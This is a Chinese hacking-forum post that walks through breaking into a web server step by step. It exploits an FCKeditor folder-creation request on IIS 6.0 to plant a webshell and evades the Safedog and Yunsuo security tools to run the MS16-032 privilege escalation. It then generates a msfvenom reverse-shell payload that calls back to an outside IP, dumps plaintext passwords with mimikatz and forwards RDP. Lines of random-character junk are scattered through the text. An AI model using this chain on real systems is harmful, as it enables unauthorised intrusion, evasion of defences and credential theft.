找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 从getwebshell到绕过安全狗云锁提权再到利用matasploit ...
返回列表 发新帖
查看: 2934|回复: 1
打印 上一主题 下一主题

从getwebshell到绕过安全狗云锁提权再到利用matasploit进服务器

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2018-10-20 20:31:43 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

6 F2 z# M. M+ J, v/ N6 J& e

: F+ U8 ~# w; D0 u t9 ]6 m) h) U7 a. ~/ E" w' j3 j0 e- }& ]* g% W6 z& [1 T+ C8 z2 ]* Q& L+ R/ p7 F( n( k) C$ Q) E1 C1 |3 e V: Q0 [' h: o# L; ?$ A# @: D/ q: Q5 g b! i2 E
: {9 {, s' a. r$ B

+ K) Q$ L2 l1 @
" g( H; ]# @# c# L一、 利用getwebshell
3 Q0 o, q+ f+ [. K3 J
& w4 w# l6 D$ a5 c首先对目标站进行扫描,发现是asp的,直接扫出网站后台和默认数据库,下载解密登陆如图:
6 Q- A; J5 b! ^! R2 ^ X
' J9 A3 L7 a: G4 J9 n! j222.png
" b2 r6 W6 w: Q0 ?下面进后台发现有fckeditor,而且还是iis6.0的,可以考虑创建个asp目录来构造解析(fck编辑器路径被改成别的需要burpsuite抓包的时候看到)
& o( S( T3 d( a* r0 {' Y. l+ f 333.png
6 [8 a. k4 D8 t- r. v+ i( c2 l' x下面我们构造一个asp目录,如: 9 ?: h& K" g# N

* |' _+ g' q4 r' U" O5 @

* ^6 ~1 i; c' O http://www.xxoo.com/manage/hscxeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975 9 L1 a4 ]0 t, U" G0 L3 g

: U5 w8 V% f6 s/ @* l

+ i% L. `! E8 C- |: E) ? 然后再给shell.asp目录上传一个jpg图片格式的一句话,然后用hatchet打开,然后看了一下支持aspx,那么我们就用包含的办法先把aspx后缀名改成.rar,然后再创建个111.ASPx,里面包含rar文件,进去以后看进程有云锁和安全狗,那么,那么我们慢慢来,慢慢来。
6 N; O$ E0 D& \' Y3 G/ e
0 u/ i* s V# U 一、 绕过安全狗云锁提权并且加账号
; h& U2 `3 f; q- W; g( c444.png
; @2 U+ j5 F& O+ u7 ~ 没法看系统信息,但是根据网站404页面可以断定是2003服务器,然后接着访问C:\Program Files (x86)存在断定是2003 64位系统,那么我们说干就干,我们上传ms16-032 64位直接干,但是发现上传exe或者别的格式exp会自动消失,看进程也没杀毒呀,没错没杀毒,是云锁有个功能防御了,那么突破云锁上传的方法就是利用rar,先把exp打包为64.rar上传,然后我们翻一下rar在哪个目录,在C:\Program Files (x86),然后开干
3 c7 E7 F/ P* @% O& l
' H# S6 M, N' k- j% W如图:
' ]& O3 r. e; K+ V555.png
& n7 ~8 I! L2 l9 L/ I& z& o' q! X然后执行直接是system权限,然后我用干狗神器给加了一个账号用tunna反弹3968提示不是远程组,我操后来也想着用getpassword64抓明文密码,但是一执行就卡死,没办法想到了metasploit
# T) a2 B$ E m( s
( N m- g; `8 |$ X一、 利用metasploit
/ @9 v' O: k& @% Z: a( {* V
$ {( S( y1 A" { 首先用pentestbox生成一个64位的payload如下命令
/ N" P% T$ A8 e" B; t) g4 N, F
/ A- k! H3 U+ M. ~4 Q5 i msfVENOM -p windows/x64meterpreter/reverse_tcp lhost=42.51.1.1 lport=443 -f exe > c:\mata.exe
, C% W4 H4 @2 \! n: ^8 k6 ~; a; U
9 O/ }' {2 t2 J1 m; x 为什么要用443端口,之前我测试用别的端口直接被墙了没法上线,下面我们在system下执行这个mata,上线如图:
/ Y' P. u# X' |: i3 G5 W+ i 11.png
5 s' d2 c8 t& b3 o! _0 P- Q0 G下面我们用这个命令抓一下明文密码命令1use mimikatz 命令2kerberos如下图:
3 t" z5 e: D" f4 h3 I: Y 13.png
$ O7 U: e$ ]) c8 i下面我们来做一个监听如下命令:
- ]# |3 j: A6 G7 q; Q1 w
1 E) z2 }: ], N8 z Gportfwd add -l 6655 -p 3968 -r 127.0.0.1,这个命令的意思就是把目标服务器的远程3968转发到pentestbox的公网IP6655端口如图:
$ \) N- e1 x: ~' Q3 H18.png . q" a& f/ o+ w/ T

% @0 x" b% e" r2 e; T$ o- m) I
7 z' ~0 b5 ^" \! n7 s: ?2 E

3 _3 s* o0 O2 f r* c

( T7 A8 [9 }) n/ m' E
, b! Y" n- e, W1 S( n2 Z
4 S* c+ f$ X0 r3 j$ b9 n8 N- h ; d" j( o( J* D A) T2 Z/ J; D

& L3 F8 h2 o" o+ \" w: F. G
' i8 \5 V5 ]* y& ^) p1 [ w ? ) X- D& ?- X) o8 b' ~# L

( h- U: U- R# c/ l0 I- i
# t; B; u$ I# Q! }5 |) N

回复

使用道具 举报

沙发
匿名  发表于 2021-11-20 23:30:06
图片怎么都没了
回复 支持 反对

使用道具

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表